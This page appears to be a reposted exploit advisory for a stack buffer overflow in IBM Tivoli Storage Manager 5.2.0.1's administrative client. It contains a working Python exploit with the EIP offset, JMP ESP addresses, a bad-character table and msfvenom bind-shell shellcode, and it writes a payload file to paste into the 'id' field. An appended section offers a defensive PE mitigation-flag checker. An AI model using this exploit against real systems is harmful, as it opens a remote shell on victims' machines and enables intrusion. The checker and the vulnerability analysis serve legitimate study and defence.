
IBM Tivoli Storage Manager 5.2.0.1 Buffer Overflow

2020-11-21 04:51
```python
#!/usr/bin/python
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - 'id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

r"""
Usage:
IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"

PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"

FileName         : dsmadmc.exe
ARCH             : I386
DotNET           : False
ASLR             : True
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : False
ControlFlowGuard : False
HighentropyVA    : False
"""

# [ buffer                              ]
# [ 68 byte | EIP | rest of the buffer  ]
#                   ^_ESP

"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

import struct

# 4000 bytes
buff_max_length = 800
eip_offset = 68

r"""
BAD CHARS:  \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
GOOD CHARS: asciiprint \x20-\x7e
MOD CHARS:  \x00 -> \x20

       ,-----------------------------------------------.
       | Comparison results:                           |
       |-----------------------------------------------|
       |                        80 81 82 83 84 85 86 87| File
       |                        3f 3f 2c 9f 2c 2e 2b d8| Memory
    80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
       |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
    90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
       |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
    a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
       |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
    b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
       |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
    c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
       |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
    d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
       |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
    e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
       |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
    f0 |f8 f9 fa fb fc fd fe ff                        | File
       |6f 97 a3 96 81 79 5f 98                        | Memory
       `-----------------------------------------------'
"""

# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode =  b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"

# Buffer layout: 68 bytes of padding, the return address, then the payload at ESP.
buff = b""
buff += b"A" * eip_offset
buff += struct.pack("<I", 0x02c73d7b)  # 0x02803d7b: because of the char modification (file 0xc7 -> memory 0x80) it has to be written as 0x02c73d7b
buff += shellcode
buff += b"C" * (buff_max_length - len(buff))
print("Writing {} bytes".format(len(buff)))
with open("IBM_TSM_v.5.2.0.1_exploit.txt", "wb") as f:
    f.write(buff)
```
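The Get-PESecurity output and the debugger's module list above both come down to the same PE header bits: dsmadmc.exe opts into ASLR and DEP, while dbghelp.dll is loaded without dynamic base, which is what gives the exploit its fixed return address. The checker below is an added example, not part of the original advisory, that reads the COFF Machine field and the optional header's DllCharacteristics directly so a defender can audit every module an application ships with; the sample PE header it runs on is constructed inline, and SafeSEH (which lives in the load-config directory) is out of its scope.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE optional header (winnt.h values).
DLL_FLAGS = {
    "HighEntropyVA": 0x0020,
    "ASLR": 0x0040,            # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
    "DEP": 0x0100,             # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
    "NoSEH": 0x0400,
    "ControlFlowGuard": 0x4000,
}
MACHINE = {0x014C: "I386", 0x8664: "AMD64"}


def pe_mitigations(data: bytes) -> dict:
    """Return the architecture and mitigation flags of the PE image in `data`."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]       # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, = struct.unpack_from("<H", data, pe_off + 4)    # COFF Machine field
    opt = pe_off + 24                                        # optional header start
    magic, = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):                          # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars, = struct.unpack_from("<H", data, opt + 70)    # same offset in both formats
    report = {"ARCH": MACHINE.get(machine, hex(machine))}
    for name, bit in DLL_FLAGS.items():
        report[name] = bool(dll_chars & bit)
    return report


def build_sample_pe(machine: int, dll_chars: int) -> bytes:
    """Constructed minimal PE header (not a real binary) used for the offline demo."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Same flag set the page reports for dsmadmc.exe: ASLR and DEP, nothing else.
    print(pe_mitigations(build_sample_pe(0x014C, 0x0040 | 0x0100)))
    # A module with no DllCharacteristics is loaded at a fixed base, like dbghelp.dll here.
    print(pe_mitigations(build_sample_pe(0x014C, 0x0000)))
```

Run it over every DLL in the application's install directory: one module without the ASLR bit is enough to undo the process-wide benefit of the main executable's flags.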


Source: cxsecurity.com/issue/WLB-2020110163

